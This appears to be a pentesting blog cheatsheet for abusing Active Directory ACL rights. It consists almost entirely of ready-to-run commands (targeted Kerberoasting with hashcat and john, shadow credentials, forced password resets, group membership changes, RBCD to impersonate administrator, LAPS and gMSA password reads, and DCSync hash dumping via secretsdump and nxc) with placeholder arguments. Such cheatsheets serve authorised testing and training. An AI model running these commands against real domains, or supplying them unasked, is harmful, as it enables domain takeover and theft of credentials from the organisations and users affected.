AD ACLs Cheatsheet
GenericWrite on User
Targeted Kerberoasting
targetedKerberoast.py -d domain --dc-ip ip -u username -p password --dc-host dc --request-user target_user
hashcat -m 13100 -a 0 <hash_file> rockyou.txt --force
john <hash_file> --wordlist=rockyou.txt
ShadowCredentials
certipy shadow auto -u username@domain -p password -account target_user -dc-ip ip
Using Kerberos
certipy shadow auto -username username@domain -k -account target_user -dc-ip ip
GenericAll
Change Password
bloodyAD --host dc -d domain -u username -p password set password target new_password
net rpc password 'username' 'new_password' -U 'domain'/'username'%'hash' -S 'dc' --pw-nt-hash
net rpc password 'username' 'new_password' -U 'domain'/'username'%'password' -S 'dc'
Add user to a group
net rpc group addmem target_group username -U domain/username -S dc
bloodyAD --host dc -d domain -u username -p password add groupMember target_group target_username
RBCD
impacket-rbcd -delegate-from machine_name -delegate-to target -dc-ip ip -action write 'domain/username:password'
impacket-getST -spn 'cifs/dc' -impersonate administrator -dc-ip ip 'domain/machine_name:password'
export KRB5CCNAME=administrator.ccache
GenericAll on OU
impacket-dacledit -action 'write' -rights 'FullControl' -inheritance -principal username -target-dn 'OU_DN' domain/username:password
ForceChangePassword
net rpc password <TargetUser> <new_password> -U "DOMAIN"/"ControlledUser"%"Password" -S <DomainController>
bloodyAD --host ip -d dc -u username -p password set password target_username new_password
python rpcchangepwd.py <domain>/<username>:<password>@<ip> -newpass <new_password>
nxc smb domain -u username -p password -M change-password -o USER='target_username' NEWPASS='new_password'
AddMember
net rpc group addmem target_group username -U domain/username -S dc
bloodyAD --host dc -d domain -u username -p password add groupMember target_group user_to_add
AddSelf
bloodyAD --host dc -d domain -u username -p password add groupMember target_group username
WriteOwner
impacket-owneredit -action write -new-owner username -target target domain/username:password
impacket-dacledit -action 'write' -rights 'FullControl' -principal username -target-dn dn 'domain/username:password'
or
impacket-dacledit -action 'write' -rights 'WriteMembers' -principal username -target-dn dn 'domain/username:password'
bloodyAD --host dc -d domain -u username -p password add groupMember target_group username
WriteSPN
bloodyAD --host dc -d domain -u username -p password set object target servicePrincipalName -v 'domain/meow'
impacket-GetUserSPNs domain/username:password -dc-ip ip -request
or
targetedKerberoast -d domain --dc-ip ip -u username -p password --dc-host dc --request-user target_user
AddKeyCredentialLink
pywhisker.py -d domain --dc-ip ip -u username -p password --target target --action add
gettgtpkinit.py -cert-pfx file.pfx -pfx-pass pfx_password domain/target ticket.ccache -dc-ip ip
getnthash.py domain/target -k key -dc-ip ip
or
certipy shadow auto -u username@domain -p password -account target_user -dc-ip ip
ReadLAPSPassword
nxc smb target -u username -p password --laps
ReadGMSAPassword
nxc ldap target -u username -p password --gmsa
DCSync
impacket-secretsdump domain/username:password@domain
impacket-secretsdump domain/username@domain -hashes :hash
impacket-secretsdump dc -k
nxc smb target -u username -p password --ntds
nxc smb target --use-kcache --ntds
Resources
- https://www.thehacker.recipes/ad/movement/dacl/
- https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/acl-abuse
- https://mayfly277.github.io/posts/GOADv2-pwning-part11/
- https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces
This post is licensed under CC BY 4.0 by the author.